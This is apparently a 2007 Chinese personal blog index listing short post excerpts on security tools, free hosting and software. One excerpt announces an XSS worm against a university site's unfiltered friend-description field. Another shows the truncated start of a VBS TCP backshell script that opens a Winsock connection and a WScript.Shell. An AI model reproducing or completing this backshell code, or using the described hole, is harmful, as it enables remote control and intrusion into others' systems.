夜火博客 个人的碎碎念收集箱

最新校内xss漏洞加利用worm

from:恶魔傻蛋网络研究中心呵呵....发现留这个东西实在没什么用处,就在这个群里首发吧.~~呵呵.希望能有对我们ncu的网络安全事业有点促进作用~~呵呵.大家别去干坏事哦~~~呵呵,自我感觉这个worm写的还不错.嘿嘿.~大家学习参考之用,危害极大,如有人用于非法用途,概不负责.存在漏洞页面:特别好友的描述那里,没有做任何过滤~

TCP版backshell的VBS脚本

From:baicker'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷'by 009, baicker@hotmail.com'date:071221Dim revdataset sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )set sc=createobject( "WScript.Shell" )Set fso =CreateObject( "Scripting.FileSystemObject" )sock.connect "127.0.0.1" , 1234......................................

卡巴斯基kaspersky 新版纯DOS杀毒软件(硬盘,软盘,闪盘,光盘,虚拟盘通用)

夜火:又是从CB上淘到的好东西,卡巴斯基kaspersky  新版纯DOS杀毒软件(硬盘、软盘、闪盘、光盘、虚拟盘通用,版本为4.0 病毒库更新到2007.12.21),虽然卡巴斯基占资源比较大,在我们班里号称“卡吧死机”,但是其杀毒能力的确很赞的说,以前就是装个卡巴斯基,不开监控,然后再装瑞星,用瑞星的监控,用卡巴斯基的杀毒,感觉很不错

使用方法:
 

一行代码解决iframe挂马(服务器端注入、客户端ARP注入等)

一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)本文原创:linr@cncert.net 请转载时保留版权信息相信大多数朋友都是iframe木马的受害者,有朋友的网站被注入了N回iframe,心情可想而知。而且现在ARP攻击,注入iframe也是轻而易举的事,仅局域网里都时刻面临威胁,哎,什么世道。灵儿曾经在经典论坛上发过贴子:《一行代码解决网站防挂IFRAME木马方案》http://bbs.blueidea.com/thread-2785512-1-1.html ,有不少朋友都联系了灵儿,有的表示感谢,不过更多的是疑问了,今天把原理细细地讲一下吧:

四大网络安全网站联合举办在线C语言免费培训活动[2007.12.21 20时开课]

狼客基地.黑色旋风.中国民间网络安全协会.黑客天下等四大网安站点将于2007年12月21日晚上8点开始为期半个月的C语言基础在线免费培训活动.
  本次活动完全免费.这也是中国民间网络安全界的又一个进步.在这里我们希望有C语言基础知识学习要求的朋友踊跃的参与进来.
  教学主要通过在线IS培训.QQ群交流.学习教程的下载学习以及作业的完成来完成整个活动的进行.
  4大网站一致通过如果本次培训效果很不错的情况下以后将联合更多的站点做更多类似的免费培训活动!
  QQ群:5826206   IS房间ID:10564987
  申明:本次C语言基础在线培训是由众多网站一起联盟打造制作的一套精品教程,而教材都来至互联网属于免费教程,没经过版权所有人同意禁止出售或交易!
  备注:更多详细情况请参见http://www.langhack.com/c.html的内容!
  民安协会 小云 (文)

稳定免费PHP空间/支持CGI+MySQL/FTP--parahosting.net

夜火:接昨天的300M免费PHP空间/支持MySQL/支持ftp-WinterHost.org,继续发一些免费的网站空间

parahosting.net稳定的免费PHP空间/支持CGI+MySQL

该空间用了几年了,现在还可以用。主要参数如下:

该免费空间大小:150M或300M,流量限制:3G或5G,支持FTP上传,免费支持MySQL/PostgreSQL(有5个)

可以免费绑定自己的域名,或者使用他们的二级米 you.parahosting.net,数据每天备份

脚本方面支持PHP、CGI,有cPanel控制面板,支持GD库

地址:....................

300M免费PHP空间/支持MySQL/支持ftp-WinterHost.org

夜火:好久没收集点免费网站空间免费网络硬盘了,今天补下

WinterHost.org提供300M免费PHP空间/支持MySQL/支持ftp(2007年12月)

该免费空间大小为:300MB,月流量限制为:10,000 MB/month,免费空间没有广告

文件上传方式支持FTP, Browser上传,支持PHP/MySQL

免费php空间申请地址:..............

卡巴斯基Kaspersky v7.0.1.321 Release Candidate MP1 变化简述

from:雅诗's Blog 今天卡巴斯基 KAV7.0.1.321 Release Candidate (正式版候选版)已经发布,MP1正式版MP1越来越近,我来说说MP1带来的变化。 1.主动防御的进一步加强 2.启发式扫描的不断进步 3.自动更新的一个人性化改变 4.系统时间问题的解决 5.反垃圾邮件和家长控制和防火墙的提高 6.稳定性和流畅性的进一步提升

AppBand V1.0.6-带宽调度器-限制程序使用的带宽

夜火:在网上闲逛的时候在http://www.46466.net/看到的一个软件,能管理带宽,以前在家里一台机器看网络电视的时候另外一台连网页都打不开,不知道这个软件管不管用,放假电脑搬回来试试

带宽调度器AppBand可以为Windows应用程序分配网络带宽并指定数据收发的优先级,用软件的方式实现桌面应用的简单QOS调度。 
(1) P2P方式的下载软件(BT/eMule/迅雷等)或者在线播放占用了绝大部分单机带宽,而浏览器、游戏程序往往在争夺带宽中落于下风。在P2P下载的同时打不开网页或者游戏ping极高是非常普遍的情况。AppBand可以将P2P软件的带宽优先级降低,从而给其它常规软件留出足够的带宽,用户可以流畅地浏览网页,低时延地玩网络游戏。 
(2) AppBand实现了动态、准确的限速。不是每一款P2P软件都可以对下载任务进行限速设置,而且用户无法完全控制其带宽的占用。 
(3) AppBand的带宽调度并不能够增加物理带宽,只是优化了有限的带宽资源在不同程序之间的分配。长期占用带宽并且实时性要求不高的P2P软件合理利用剩余带宽,其他关键应用程序则不受任何限制。 
 

WSysCheck1216 中文版——替代SysCheck的软件

夜火:SysCheck是一款很好用的安全工具,今天在CB上看到其停止更新了,原作者开发了一个WSysCheck代替之,说的蛮好,不知道用起来如何,先下下来了,还没试。 一款强大的系统检测维护工具,进程和服务驱动检查,SSDT强化检测,文件查询,注册表操作,DOS删除等一应俱全. 该作品为wangsea近期的主打作品,其他比较好的作品还有系统安全盾、syscheck,大家应该不会陌生.特别说明一下,SysCheck现在已经不更新了,WSysCheck可以说是SysCheck的升级版或强化版.

SmartHde - 免费VPN软件

夜火:VPN,呵呵,想起了以前玩韩服跑跑卡丁车的时候用HSS连接VPN登陆韩服了(没办法,韩服卡丁车游戏限制了中国的IP,单用代理还不管用,不知道现在怎么样了),想想也大半年没碰跑跑卡丁车了,怀念啊~,今天在CB上看到这个免费VPN软件,不知道速度怎么样,为还在为韩服游戏奋斗的朋友们加油助威~